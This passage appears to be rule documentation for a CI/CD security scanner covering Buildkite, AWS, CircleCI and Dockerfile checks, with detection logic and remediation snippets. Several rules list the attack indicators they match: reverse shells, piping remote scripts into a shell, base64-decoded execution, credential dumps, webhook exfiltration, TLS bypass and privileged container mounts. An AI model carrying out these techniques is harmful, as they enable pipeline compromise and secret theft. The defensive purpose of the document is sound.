How this is detected. A step is treated as a deploy when its label, key, or any command line contains a deploy keyword (deploy, ship-it, release, promote, rollout, helm upgrade, kubectl apply, terraform apply, aws ecs update-service, aws lambda update-function-code, gcloud run deploy). The check passes when the step declares branches: with at least one literal branch name (a wildcard like "*" is treated as an explicit opt-out, not a passing filter, and still trips). The pipeline-level default also counts: a branches: filter declared at the top level of the pipeline propagates to its steps.
Recommendation. Add branches: "main release/*" (or your release branch glob) to every deploy step. Buildkite skips the step on any other branch, which prevents a feature-branch PR from accidentally promoting code to production. Combine with BK-007's manual block: so a release branch plus a human approval is the path to deploy.
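Combined with BK-007's block step, the deploy path might look like this (the script path is illustrative):

```yaml
steps:
  - block: ":rocket: Approve production deploy"
    branches: "main release/*"
  - label: "deploy"
    branches: "main release/*"   # literal branch names; a bare "*" still trips the check
    command: "./scripts/deploy.sh"
```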
Known false positives.
- Trunk-based teams that branch-protect main and treat every merge as a deploy candidate may not use branches:. Add branches: main to make the policy explicit, or ignore BK-013 in .pipeline-check-ignore.yml with a scope of main-only repos.
Source: BK-013 in the Buildkite provider.
CA-004: CodeArtifact repo policy grants codeartifact:* with Resource '*' HIGH
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. codeartifact:* on Resource: '*' collapses the entire repository's authority into one grant: the holder can read, write, delete, dispose, and re-publish every package. Even for a service principal that nominally only consumes packages, the grant lets a compromise of that consumer rewrite every dependency the team relies on.
Recommendation. Scope Allow statements to specific codeartifact: actions (e.g. codeartifact:ReadFromRepository) and to specific package-group ARNs. Wildcard action + wildcard resource is the classic over-broad grant that lets a consumer also publish.
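A scoped grant might look like this (CloudFormation-style YAML; the account ID, role name, and repository ARN are placeholders):

```yaml
PolicyDocument:
  Version: "2012-10-17"
  Statement:
    - Sid: ConsumersReadOnly
      Effect: Allow
      Principal:
        AWS: "arn:aws:iam::123456789012:role/ci-consumer"
      Action:
        # read/consume only; no publish, delete, or dispose
        - "codeartifact:ReadFromRepository"
        - "codeartifact:GetPackageVersionAsset"
      Resource: "arn:aws:codeartifact:us-east-1:123456789012:repository/my-domain/my-repo"
```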
Source: CA-004 in the AWS provider.
CB-001: Secrets in plaintext environment variables CRITICAL
Evidences: CC6.2 New internal and external users are registered, authorized, and provisioned.
How this is detected. Flags a plaintext env var when either (a) its name matches a secret-like pattern (PASSWORD, TOKEN, API_KEY, ...) or (b) its value matches a known credential shape (AKIA/ASIA access keys, GitHub tokens, Slack xox* tokens, JWTs). Plaintext values are visible in the AWS console, CloudTrail, and build logs to anyone with read access.
Recommendation. Move secrets to AWS Secrets Manager or SSM Parameter Store and reference them using type SECRETS_MANAGER or PARAMETER_STORE in the CodeBuild environment variable configuration.
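In a CloudFormation CodeBuild project the fix has this shape (variable names and the secret path are placeholders):

```yaml
Environment:
  EnvironmentVariables:
    - Name: DB_PASSWORD
      Type: SECRETS_MANAGER
      Value: "prod/db/password"   # the Secrets Manager reference, not the secret itself
    - Name: APP_ENV
      Type: PLAINTEXT             # plaintext remains fine for non-sensitive values
      Value: "production"
```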
Source: CB-001 in the AWS provider.
CB-002: Privileged mode enabled HIGH
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. Privileged mode grants the build container root access to the host's Docker daemon. A compromised build can escape the container or tamper with the host. Only flip this on for real Docker-in-Docker workloads and keep the buildspec under branch-protected review.
Recommendation. Disable privileged mode unless the project explicitly requires Docker-in-Docker builds. If required, ensure the buildspec is tightly controlled, peer-reviewed, and sourced from a trusted repository with branch protection.
Source: CB-002 in the AWS provider.
CB-003: Build logging not enabled MEDIUM
Evidences: CC7.2 System components are monitored for anomalies indicative of malicious acts or failures.
How this is detected. A CodeBuild project with neither CloudWatch Logs nor S3 logging enabled leaves no durable record of what the build did. The CodeBuild console shows the last execution's logs for a short retention window, but anything older, and any automated review of historical activity during incident response, is gone.
Recommendation. Enable CloudWatch Logs or S3 logging in the CodeBuild project configuration to maintain a durable audit trail of all build activity.
Source: CB-003 in the AWS provider.
CB-005: Outdated managed build image MEDIUM
Evidences: CC7.1 Detection procedures identify configuration changes that introduce vulnerabilities.
How this is detected. Only AWS-managed aws/codebuild/standard:N.0 images are version-checked. Custom or third-party images pass here; CB-009 handles the separate concern of tag-vs-digest pinning for custom images.
Recommendation. Update the CodeBuild environment image to aws/codebuild/standard:7.0 or later to ensure the build environment receives the latest security patches.
Known false positives.
- One version behind the current aws/codebuild/standard is a hygiene warning, not a production issue, and defaults to MEDIUM confidence. The rule emits HIGH only when the project is two or more versions behind. Custom or third-party images are not version-checked here; CB-009 handles tag-vs-digest pinning for those.
Source: CB-005 in the AWS provider.
CB-006: CodeBuild source auth uses long-lived token HIGH
Evidences: CC6.3 Access modifications (including revocation) are tracked and timely.
How this is detected. OAUTH / PERSONAL_ACCESS_TOKEN / BASIC_AUTH source credentials are stored long-lived on the account and used by every CodeBuild project that points at the SCM provider. Rotating the upstream PAT requires manual re-credentialing here too. CodeConnections (CodeStar) is the AWS-managed alternative with token refresh and revocation.
Recommendation. Switch to an AWS CodeConnections (CodeStar) connection and reference it from the source configuration. Delete any stored source credentials of type OAUTH, PERSONAL_ACCESS_TOKEN, or BASIC_AUTH via delete_source_credentials.
Source: CB-006 in the AWS provider.
CB-008: CodeBuild buildspec is inline (not sourced from a protected repo) HIGH
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. An inline buildspec (source.buildspec set to YAML text, or an S3 URL) bypasses the protections that cover your source code. A user with codebuild:UpdateProject can rewrite the build commands without touching the repository: no PR review, no branch protection, no audit of what changed. Store buildspec.yml in the repo instead.
Recommendation. Remove the inline buildspec and store buildspec.yml in the source repository under branch protection. Anyone with codebuild:UpdateProject can silently rewrite an inline buildspec; repository-sourced buildspecs inherit the repo's review and protection controls.
Source: CB-008 in the AWS provider.
CB-011: CodeBuild buildspec contains indicators of malicious activity CRITICAL
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Scans the source.buildspec text on every CodeBuild project for concrete attack indicators: reverse shells, base64-decoded execution, miner binaries/pools, Discord/Telegram webhooks, credential-dump pipes, audit-erasure commands. CB-011 is CRITICAL by design: a true positive is evidence of compromise, not a hygiene improvement. Repo-sourced buildspecs (not inlined) return NOT APPLICABLE because the text isn't visible to the scanner; CB-008 already flags the inline form as a governance gap.
Recommendation. Treat as a potential compromise. Identify which principal or pipeline ran the CodeBuild project recently, rotate its service role's credentials, audit CloudTrail for outbound activity to the matched hosts, and, if an inline buildspec is in use (CB-008), enforce repo-sourced buildspecs under branch protection so the next malicious edit requires a PR.
Known false positives.
- Security-training repositories, CTF challenges, and red-team exercise pipelines legitimately contain reverse-shell strings or exfil domains as literals. Matches inside YAML keys / HCL attributes whose names contain example, fixture, sample, demo, or test are auto-suppressed; bare lines in a production pipeline still fire.
- Defaults to LOW confidence. Filter with --min-confidence MEDIUM to ignore all matches; the rule still surfaces the hit for teams that want to spot-check.
Source: CB-011 in the AWS provider.
CC-001: Orb not pinned to exact semver HIGH 🔧 fix
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Orb references in the orbs: block must include an @x.y.z suffix to lock a specific version. References without @, with @volatile, or with only a major (@1) or major.minor (@5.1) version float and can silently pull in malicious updates.
Recommendation. Pin every orb to an exact semver version (circleci/node@5.1.0). Floating references like @volatile, @1, or bare names without @ resolve to whatever is latest at build time, allowing a compromised orb update to execute in the pipeline.
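The passing and failing shapes, side by side:

```yaml
orbs:
  node: circleci/node@5.1.0        # exact semver: passes
  # node: circleci/node@5.1        # major.minor only: floats, flagged
  # node: circleci/node@volatile   # always-latest: flagged
  # node: circleci/node            # no @ at all: flagged
```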
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: CC-001 in the CircleCI provider.
CC-002: Script injection via untrusted environment variable HIGH
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. CircleCI exposes environment variables like $CIRCLE_BRANCH, $CIRCLE_TAG, and $CIRCLE_PR_NUMBER that are controlled by the event source (branch name, tag, PR). Interpolating them unquoted into run: commands allows shell injection via specially crafted branch or tag names.
Recommendation. Do not interpolate attacker-controllable environment variables (CIRCLE_BRANCH, CIRCLE_TAG, CIRCLE_PR_NUMBER, etc.) directly into shell commands. Pass them through an intermediate variable and quote them, or use CircleCI pipeline parameters instead.
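A sketch of the safe pattern (the job and run step are illustrative):

```yaml
jobs:
  build:
    docker:
      - image: cimg/base:stable
    steps:
      - run:
          name: Handle branch name safely
          # Assign to an intermediate variable and quote every expansion;
          # a maliciously named branch then stays inert data, not shell syntax.
          command: |
            branch="$CIRCLE_BRANCH"
            echo "building ${branch}"
```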
Source: CC-002 in the CircleCI provider.
CC-005: AWS auth uses long-lived access keys in environment block MEDIUM 🔧 fix
Evidences: CC6.2 New internal and external users are registered, authorized, and provisioned, CC6.3 Access modifications (including revocation) are tracked and timely.
How this is detected. Long-lived AWS access keys declared directly in a job's environment: block are visible to anyone who can read the config. They cannot be rotated automatically and remain valid until manually revoked. OIDC-based federation yields short-lived credentials per build.
Recommendation. Remove AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY from the job environment: block. Use CircleCI's OIDC token with aws-cli/setup orb's role-based auth, or store credentials in a context with security group restrictions.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: CC-005 in the CircleCI provider.
CC-008: Credential-shaped literal in config body CRITICAL 🔧 fix
Evidences: CC6.2 New internal and external users are registered, authorized, and provisioned.
How this is detected. Every string in the config is scanned against a set of credential patterns (AWS access keys, GitHub tokens, Slack tokens, JWTs, Stripe, Google, Anthropic, etc.). A match means a secret was pasted into YAML; the value is visible in every fork and every build log and must be treated as compromised.
Recommendation. Rotate the exposed credential immediately. Move the value to a CircleCI project environment variable or a context and reference it via the variable name. For cloud access, prefer OIDC federation over long-lived keys.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Test fixtures and documentation blobs sometimes embed credential-shaped strings (JWT samples, AKIAI... examples). The AWS canonical example AKIAIOSFODNN7EXAMPLE is deliberately NOT suppressed: if it appears in a real pipeline it almost always means a copy-paste from docs was never substituted. Defaults to LOW confidence.
Source: CC-008 in the CircleCI provider.
CC-009: Deploy job missing manual approval gate MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. In CircleCI, manual approval is implemented by adding a job with type: approval to the workflow and making the deploy job require it. Without this gate, any push to the triggering branch deploys immediately with no human review.
Recommendation. Add a type: approval job that precedes the deploy job in the workflow, and list it in the deploy job's requires:. This ensures a human must click Approve in the CircleCI UI before production changes roll out.
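The workflow shape looks like this (job names are illustrative):

```yaml
workflows:
  release:
    jobs:
      - build
      - hold:
          type: approval        # pauses here until a human clicks Approve
          requires: [build]
      - deploy:
          requires: [hold]      # deploy only runs after the approval job
```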
Source: CC-009 in the CircleCI provider.
CC-010: Self-hosted runner without ephemeral marker MEDIUM
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. Self-hosted runners that persist between jobs leak filesystem and process state. A PR-triggered job writes to /tmp; a subsequent prod-deploy job on the same runner reads it. The check looks for resource_class values containing 'self-hosted'; if found, it checks for 'ephemeral' in the value. It also flags machine: true combined with a self-hosted resource class.
Recommendation. Configure self-hosted runners to tear down between jobs. Use a resource_class value that includes an ephemeral marker, or use CircleCI's machine executor with runner auto-scaling so each job gets a fresh environment.
Source: CC-010 in the CircleCI provider.
CC-011: No store_test_results step (test results not archived) LOW
Evidences: CC7.2 System components are monitored for anomalies indicative of malicious acts or failures.
How this is detected. Without store_test_results, test output is only available in the raw build log. Archiving test results enables CircleCI's test insights, timing-based splitting, and provides an audit trail that links each build to its test outcomes.
Recommendation. Add a store_test_results step to jobs that run tests. This archives test results in CircleCI for traceability, trend analysis, and debugging flaky tests.
Source: CC-011 in the CircleCI provider.
CC-013: Deploy job in workflow has no branch filter MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Without branch filters, a deploy job triggers on every branch push, including feature branches and forks. Restricting sensitive jobs to specific branches limits the blast radius of a compromised commit.
Recommendation. Add filters.branches.only to deploy-like workflow jobs so they only run on protected branches (e.g. main, release/*).
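For example (branch names are illustrative; CircleCI accepts regexes between slashes):

```yaml
workflows:
  deploy:
    jobs:
      - deploy-prod:
          filters:
            branches:
              only:
                - main
                - /release\/.*/
```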
Source: CC-013 in the CircleCI provider.
CC-016: Remote script piped to shell interpreter HIGH 🔧 fix
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Detects curl | bash, wget | sh, and similar patterns that pipe remote content directly into a shell interpreter inside a CircleCI config. An attacker who controls the remote endpoint (or poisons DNS / CDN) gains arbitrary code execution in the CI runner.
Recommendation. Download the script to a file, verify its checksum, then execute it. Or vendor the script into the repository.
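A sketch of the download-verify-execute pattern (the URL is a placeholder, and the pinned digest must come from a version you actually vetted):

```yaml
- run:
    name: Install tool with checksum verification
    command: |
      curl -fsSLo install.sh https://example.com/install.sh
      # sha256sum -c fails the step if the file doesn't match the pinned digest
      echo "<pinned-sha256>  install.sh" | sha256sum -c -
      sh install.sh
```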
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Established vendor installers (get.docker.com, sh.rustup.rs, bun.sh/install, awscli.amazonaws.com, cli.github.com, ...) ship via HTTPS from their own CDN and are idiomatic. This rule defaults to LOW confidence so CI gates can ignore them with --min-confidence MEDIUM; the finding still surfaces so teams that want cryptographic verification can audit.
Source: CC-016 in the CircleCI provider.
CC-017: Docker run with insecure flags (privileged/host mount) CRITICAL 🔧 fix
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. Flags like --privileged, --cap-add, --net=host, or host-root volume mounts (-v /:/) in a CircleCI config give the container full access to the runner, enabling container escape and lateral movement.
Recommendation. Remove --privileged and --cap-add flags. Use minimal volume mounts. Prefer rootless containers.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: CC-017 in the CircleCI provider.
CC-019: add_ssh_keys without fingerprint restriction HIGH
Evidences: CC6.3 Access modifications (including revocation) are tracked and timely.
How this is detected. A bare - add_ssh_keys step (without fingerprints:) loads every SSH key configured on the project into the job. This violates least privilege: the job gains access to keys it does not need, increasing the blast radius if the job is compromised.
Recommendation. Always specify fingerprints: when using add_ssh_keys to restrict which SSH keys are loaded into the job. A bare add_ssh_keys step loads ALL project SSH keys.
Source: CC-019 in the CircleCI provider.
CC-020: No vulnerability scanning step MEDIUM
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Without a vulnerability scanning step, known-vulnerable dependencies ship to production undetected. The check recognises trivy, grype, snyk, npm audit, yarn audit, safety check, pip-audit, osv-scanner, and govulncheck.
Recommendation. Add a vulnerability scanning step: trivy, grype, snyk test, npm audit, pip-audit, or osv-scanner. Publish results so vulnerabilities surface before deployment.
Source: CC-020 in the CircleCI provider.
CC-023: TLS / certificate verification bypass HIGH 🔧 fix
Evidences: CC6.7 Data in transit is protected from unauthorized disclosure.
How this is detected. Detects patterns that disable TLS certificate verification: git config http.sslVerify false, NODE_TLS_REJECT_UNAUTHORIZED=0, npm config set strict-ssl false, curl -k, wget --no-check-certificate, PYTHONHTTPSVERIFY=0, and GOINSECURE=. Disabling TLS verification allows MITM injection of malicious packages, repositories, or build tools.
Recommendation. Remove TLS verification bypasses. Fix certificate issues at the source (install CA certificates, configure proper trust stores) instead of disabling verification.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: CC-023 in the CircleCI provider.
CC-024: No SLSA provenance attestation produced MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Signing (cosign sign) binds identity to bytes; attestation (cosign attest) binds a structured claim about how the artifact was built. SLSA verifiers check the latter so consumers can enforce builder/source/parameter policies.
Recommendation. Add a run: cosign attest command against a provenance.intoto.jsonl statement, or use the circleci/attestation orb. CC-006 covers signing; this rule covers the build-provenance step SLSA Build L3 requires.
Source: CC-024 in the CircleCI provider.
CC-026: Config contains indicators of malicious activity CRITICAL
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Fires on concrete indicators only (reverse shells, base64-decoded execution, miner binaries, Discord/Telegram webhooks, webhook.site callbacks, credential-dump pipes, history-erasure).
Recommendation. Treat as a potential compromise. Identify the PR that added the matching step(s), rotate any contexts/env vars the pipeline can reach, and audit recent CircleCI runs for outbound traffic to the matched hosts.
Known false positives.
- Security-training repositories, CTF challenges, and red-team exercise pipelines legitimately contain reverse-shell strings or exfil domains as literals. Matches inside YAML keys / HCL attributes whose names contain example, fixture, sample, demo, or test are auto-suppressed; bare lines in a production pipeline still fire.
- Defaults to LOW confidence. Filter with --min-confidence MEDIUM to ignore all matches; the rule still surfaces the hit for teams that want to spot-check.
Source: CC-026 in the CircleCI provider.
CC-027: Dangerous shell idiom (eval, sh -c variable, backtick exec) HIGH
Evidences: CC6.8 Controls prevent or detect the introduction of malicious software.
How this is detected. Complements CC-002 (script injection from untrusted context). Fires on intrinsically risky shell idioms (eval, sh -c "$X", backtick exec) regardless of whether the input source is currently trusted.
Recommendation. Replace eval "$VAR" / sh -c "$VAR" / backtick exec with direct command invocation. Validate or allow-list any value that must feed a dynamic command at the boundary.
Known false positives.
- eval "$(ssh-agent -s)" and similar eval "$(<literal-tool>)" bootstrap idioms are intentionally NOT flagged: the substituted command is literal; only its output is eval'd.
Source: CC-027 in the CircleCI provider.
CC-030: Workflow job uses context without branch filter or approval gate MEDIUM
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. CircleCI contexts are the recommended way to store shared secrets, but binding a context to a job is only half of least privilege; the other half is controlling when the binding activates. Unrestricted workflow entries with context: turn every branch push into a secret-read event.
Recommendation. Either add filters.branches.only: [<protected branches>] to restrict when the context-bound job runs, or require a type: approval job in requires: so a human gates the secret-carrying execution. Without either gate, every push to the project loads the context's secrets into an ephemeral runner where any compromised step can exfiltrate them.
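The branch-filter variant, sketched (context and branch names are placeholders):

```yaml
workflows:
  publish:
    jobs:
      - release:
          context: prod-secrets     # secret-carrying binding...
          filters:
            branches:
              only: [main]          # ...activates only on the protected branch
```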
Source: CC-030 in the CircleCI provider.
CCM-001: CodeCommit repository has no approval rule template attached HIGH
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Approval-rule templates are CodeCommit's analog of GitHub's branch-protection require-review. Without one associated, the repository accepts merges from any push-permitted principal, including the PR author themselves, without any second-pair-of-eyes gate.
Recommendation. Create a CodeCommit approval-rule template requiring at least one approval from a designated pool of reviewers and associate it with every repository. Without one, any PR author with push rights can self-approve and merge.
Source: CCM-001 in the AWS provider.
CCM-003: CodeCommit trigger targets SNS/Lambda in a different account MEDIUM
Evidences: CC6.1 Logical access controls restrict entities to authorized system resources.
How this is detected. A repo trigger pointing at an SNS topic or Lambda in a different account fires under the receiving account's permissions on every push. Sometimes this is the intended shape (a centralized notifications account), but a cross-account fan-out from a compromised repo can drive actions in the receiving account that the source-account owner can't directly observe.
Recommendation. Move trigger targets into the same account as the repository or explicitly document the cross-account relationship. Cross-account triggers extend the blast radius of a repository compromise to whatever the target ARN can do.
Source: CCM-003 in the AWS provider.
CD-001: Automatic rollback on failure not enabled MEDIUM
Evidences: CC7.4 Identified security incidents trigger a response process.
How this is detected. Without autoRollbackConfiguration, a CodeDeploy deployment that fails leaves the failed revision live until an operator notices. The default is opt-in, not opt-out: deployments fail open rather than failing back.
Recommendation. Enable autoRollbackConfiguration with at least the DEPLOYMENT_FAILURE event so CodeDeploy automatically reverts to the last successful revision when a deployment fails.
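In CloudFormation the deployment-group fragment looks like this:

```yaml
AutoRollbackConfiguration:
  Enabled: true
  Events:
    - DEPLOYMENT_FAILURE
    - DEPLOYMENT_STOP_ON_ALARM   # pairs with CD-003's alarm wiring
```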
Source: CD-001 in the AWS provider.
CD-002: AllAtOnce deployment config, no canary or rolling strategy HIGH
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. AllAtOnce shifts 100% of traffic to the new revision in one step. There's no gradient to halt on: if a CloudWatch alarm trips mid-rollout, the bad revision is already serving every request. Canary / linear configs introduce the shift-then-watch shape that lets monitors catch a regression before it's universal.
Recommendation. Switch to a canary or linear deployment configuration (e.g. CodeDeployDefault.LambdaCanary10Percent5Minutes or a custom rolling config) so that defects are caught before they affect all instances or traffic.
Source: CD-002 in the AWS provider.
CD-003: No CloudWatch alarm monitoring on deployment group MEDIUM
Evidences: CC7.3 Security events are evaluated to determine if they require response, CC7.4 Identified security incidents trigger a response process.
How this is detected. Alarm-based rollback is what lets a canary configuration actually stop a bad deploy mid-flight. Without alarms wired into alarmConfiguration, CodeDeploy's only signal that the deploy went wrong is the deployment-state machine itself, which doesn't notice an application-level regression. CD-002's canary work and this rule's alarm-based halt are paired.
Recommendation. Add CloudWatch alarms (e.g. error rate, 5xx count, latency p99) to the deployment group's alarmConfiguration. Enable automatic rollback on DEPLOYMENT_STOP_ON_ALARM to halt bad deployments.
Source: CD-003 in the AWS provider.
CP-001: No approval action before deploy stages HIGH
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. A pipeline that goes Source -> Build -> Deploy with no Approval action means every commit on the source branch ships, with no human ack between code-merged and code-running-in-prod. The Manual approval action is the intentional pause point; combine with CP-005 for production-tagged stages specifically.
Recommendation. Add a Manual approval action to a stage that precedes every Deploy stage that targets a production or sensitive environment.
Source: CP-001 in the AWS provider.
CP-003: Source stage using polling instead of event-driven trigger LOW
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. PollForSourceChanges=true polls the source repo every minute or two. Beyond the API-quota and latency cost, polling produces a less useful CloudTrail story than event-driven triggers: you see the poll calls, not the specific commit that started the pipeline. EventBridge / CodeCommit triggers tie each pipeline start to the originating event.
Recommendation. Set PollForSourceChanges=false and configure an Amazon EventBridge rule or CodeCommit trigger to start the pipeline on change. This reduces latency, API usage, and improves auditability.
Known false positives.
- PollForSourceChanges=true is the CFN default for CodeCommit sources, so legacy templates can carry the flag without an active design decision behind it. The rule is advisory (consider EventBridge / CodeStarSourceConnection) rather than a real risk; defaults to LOW confidence so CI gates default-filter it.
Source: CP-003 in the AWS provider.
CP-004: Legacy ThirdParty/GitHub source action (OAuth token) HIGH
Evidences: CC6.3 Access modifications (including revocation) are tracked and timely.
How this is detected. The legacy ThirdParty/GitHub source-action provider stores a long-lived OAuth token in the pipeline's action configuration. The token has whatever scope the granting GitHub user has, never rotates, and isn't directly revocable from the AWS side. CodeConnections (formerly CodeStar Connections) replaces this with an AWS-managed connection that the GitHub user can revoke.
Recommendation. Migrate to owner=AWS, provider=CodeStarSourceConnection and reference a CodeConnections connection ARN.
Source: CP-004 in the AWS provider.
CP-005: Production Deploy stage has no preceding ManualApproval MEDIUM
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. The complement to CP-001: this rule fires only on stages whose name contains prod / production / live. Even teams that intentionally skip approvals for dev / staging deploys usually want a human in the loop for a production-tagged target.
Recommendation. Add a Manual approval action immediately before any stage whose name contains prod / production. CP-001 covers the generic case; this rule specifically looks at production-tagged stages where the blast radius of an unreviewed deploy is largest.
Source: CP-005 in the AWS provider.
CP-007: CodePipeline v2 PR trigger accepts all branches HIGH
Evidences: CC6.6 Boundary-protection measures restrict access from outside the system boundary.
How this is detected. V2 pipelines added native PR triggers; without a branches.includes filter, any PR, including fork PRs from outside the org, fires the pipeline. The build stage runs with whatever IAM authority the pipeline's role carries, which is the full attack surface a fork-PR compromise can reach.
Recommendation. On V2 pipelines, add an includes filter under the trigger's branches block (and optionally pullRequest.events) so only PRs targeting specific branches run. Without a filter, any fork-PR can execute the pipeline's build and deploy stages.
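A sketch of the V2 trigger block (CloudFormation-style YAML; the action name and branch globs are illustrative):

```yaml
Triggers:
  - ProviderType: CodeStarSourceConnection
    GitConfiguration:
      SourceActionName: Source
      PullRequest:
        - Events: [OPEN, UPDATED]
          Branches:
            Includes: [main, "release/*"]   # fork PRs to other branches never fire
```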
Source: CP-007 in the AWS provider.
CT-001: No active CloudTrail trail in region HIGH
Evidences: CC7.2 System components are monitored for anomalies indicative of malicious acts or failures.
How this is detected. CloudTrail is the only AWS-native source of record for management-plane API calls. A region with no active trail blinds incident responders: a pipeline compromise is invisible once the in-memory CloudWatch buffer rolls over.
Recommendation. Create a CloudTrail trail that logs management events in this region and start logging. Without a trail, CodeBuild/CodePipeline/IAM API activity, including credential changes during a compromise, has no durable audit record.
Source: CT-001 in the AWS provider.
CT-002: CloudTrail log-file validation disabled MEDIUM
Evidences: CC7.2 System components are monitored for anomalies indicative of malicious acts or failures.
How this is detected. CloudTrail logs are S3 objects. Without log-file validation, an attacker with s3:PutObject on the trail bucket can edit log files to remove evidence of their activity, and there's no digest to compare against. With validation on, every hour of logs is summarized in a signed digest file under CloudTrail-Digest/.
Recommendation. Set LogFileValidationEnabled=true on every CloudTrail trail. Log validation produces a signed digest file alongside each log object so tampering by an attacker who also has S3 write access can be detected after the fact.
Source: CT-002 in the AWS provider.
CT-003: CloudTrail trail is not multi-region MEDIUM
Evidences: CC7.2 System components are monitored for anomalies indicative of malicious acts or failures.
How this is detected. An attacker who knows your CloudTrail trail is regional deliberately operates from a different region. Multi-region trails capture management events from every region into a single trail, closing the gap without you having to enumerate which regions you actually use.
Recommendation. Convert the trail to a multi-region trail. A single-region trail misses activity in every other region; an attacker aware of the scope can drive reconnaissance or persistence from an unlogged region.
Source: CT-003 in the AWS provider.
CW-001: No CloudWatch alarm on CodeBuild FailedBuilds metric LOW
Evidences: CC7.2 System components are monitored for anomalies indicative of malicious acts or failures.
How this is detected. Failure-rate signals are how on-call learns about an unfamiliar build crashing in a loop, an attacker probing the build environment, or a CI quota being exhausted. CloudWatch captures the FailedBuilds metric automatically; the alarm is the missing fan-out.
Recommendation. Create a CloudWatch alarm on the AWS/CodeBuild namespace FailedBuilds metric (aggregated or per-project). Without one, repeated build failures during a compromise, or a runaway fork-PR build, won't reach on-call.
Source: CW-001 in the AWS provider.
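One way to wire the alarm with the AWS CLI (the alarm name, thresholds, and SNS topic ARN are placeholders to adapt):

```shell
aws cloudwatch put-metric-alarm \
  --alarm-name codebuild-failed-builds \
  --namespace AWS/CodeBuild \
  --metric-name FailedBuilds \
  --statistic Sum \
  --period 300 \
  --evaluation-periods 1 \
  --threshold 1 \
  --comparison-operator GreaterThanOrEqualToThreshold \
  --alarm-actions arn:aws:sns:us-east-1:123456789012:ci-alerts
```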
CWL-001: CodeBuild log group has no retention policy LOW
Evidences: CC7.2 System components are monitored for anomalies indicative of malicious acts or failures.
How this is detected. CloudWatch Logs created by CodeBuild default to Never Expire retention. Build logs frequently echo secrets accidentally (a set -x script, an env dump in an error trace), so unbounded retention extends the exposure window for every secret a build has ever leaked. A short-but-finite retention also caps cost.
Recommendation. Set a retention policy on every /aws/codebuild/* log group. The default is 'Never Expire', which both racks up storage cost and keeps logs indefinitely past any compliance window.
Source: CWL-001 in the AWS provider.
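Setting the policy is a one-liner per log group (the group name and 90-day window are placeholders; pick a window that matches your compliance requirements):

```shell
aws logs put-retention-policy \
  --log-group-name /aws/codebuild/my-project \
  --retention-in-days 90
```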
CWL-002: CodeBuild log group not KMS-encrypted MEDIUM
Evidences: CC7.2 System components are monitored for anomalies indicative of malicious acts or failures.
How this is detected. CloudWatch Logs' default encryption is service-managed: fine for confidentiality, but it offers no key-level audit trail or access scoping. Build logs are a frequent secret-leak vector (CWL-001's rationale, extended), so the same key-policy + Decrypt-event story you'd apply to S3 / Lambda / Secrets Manager is warranted here too.
Recommendation. Associate a customer-managed KMS key with every /aws/codebuild/* log group via associate-kms-key. Logs often contain secret material accidentally echoed by builds; encrypting them with a CMK means the key policy controls who can read the logs, not just S3/CloudWatch IAM.
Source: CWL-002 in the AWS provider.
DF-001: FROM image not pinned to sha256 digest HIGH 🔧 fix
Evidences: CC8.1 Changes to infrastructure, data, software, and procedures are authorized, designed, tested, approved, and implemented.
How this is detected. Reuses _primitives/image_pinning.classify so the floating-tag semantics match GL-001 / JF-009 / ADO-009 / CC-003. PINNED_TAG (e.g. python:3.12.1-slim) is treated as unpinned here too; only an explicit @sha256: survives, since a tag is mutable on the registry side.
Recommendation. Resolve every base image to its current digest (docker buildx imagetools inspect <ref> prints it) and pin via FROM repo@sha256:<digest>. Automate refreshes with Renovate or Dependabot. A floating tag (:latest, :3, no tag) silently swaps the build base under every rebuild.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Seen in the wild.
